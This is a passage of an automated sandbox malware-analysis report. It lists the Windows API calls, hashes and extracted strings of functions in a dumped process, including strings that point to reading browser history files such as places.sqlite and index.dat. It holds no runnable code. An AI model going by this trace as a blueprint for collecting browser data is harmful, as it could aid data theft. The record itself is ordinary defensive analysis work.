                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                            • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                              • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                            • String ID:
                                                            • API String ID: 1042154641-0
                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                              • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                            • String ID:
                                                            • API String ID: 2947809556-0
                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                            • memset.MSVCRT ref: 00403A55
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                            • String ID: history.dat$places.sqlite
                                                            • API String ID: 3093078384-467022611
                                                            • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                            • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                            • GetLastError.KERNEL32 ref: 00417627
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$File$PointerRead
                                                            • String ID:
                                                            • API String ID: 839530781-0
                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID: *.*$index.dat
                                                            • API String ID: 1974802433-2863569691
                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@mallocmemcpy
                                                            • String ID:
                                                            • API String ID: 3831604043-0
                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FilePointer
                                                            • String ID:
                                                            • API String ID: 1156039329-0
                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$ChangeCloseCreateFindNotificationTime
                                                            • String ID:
                                                            • API String ID: 1631957507-0
                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                            • String ID:
                                                            • API String ID: 1125800050-0
                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            • failed memory resize %u to %u bytes, xrefs: 00415358
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: realloc
                                                            • String ID: failed memory resize %u to %u bytes
                                                            • API String ID: 471065373-2134078882
                                                            • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                            • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                                            • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                            • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: BINARY
                                                            • API String ID: 2221118986-907554435
                                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                            • String ID:
                                                            • API String ID: 1161345128-0
                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID: /stext
                                                            • API String ID: 2081463915-3817206916
                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                            • String ID:
                                                            • API String ID: 159017214-0
                                                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 3150196962-0
                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: malloc
                                                            • String ID: failed to allocate %u bytes of memory
                                                            • API String ID: 2803490479-1168259600
                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcmpmemset
                                                            • String ID:
                                                            • API String ID: 1065087418-0
                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID:
                                                            • API String ID: 1297977491-0
                                                            • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                            • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                            • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                            • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                            • String ID:
                                                            • API String ID: 1481295809-0
                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                            • String ID:
                                                            • API String ID: 3150196962-0
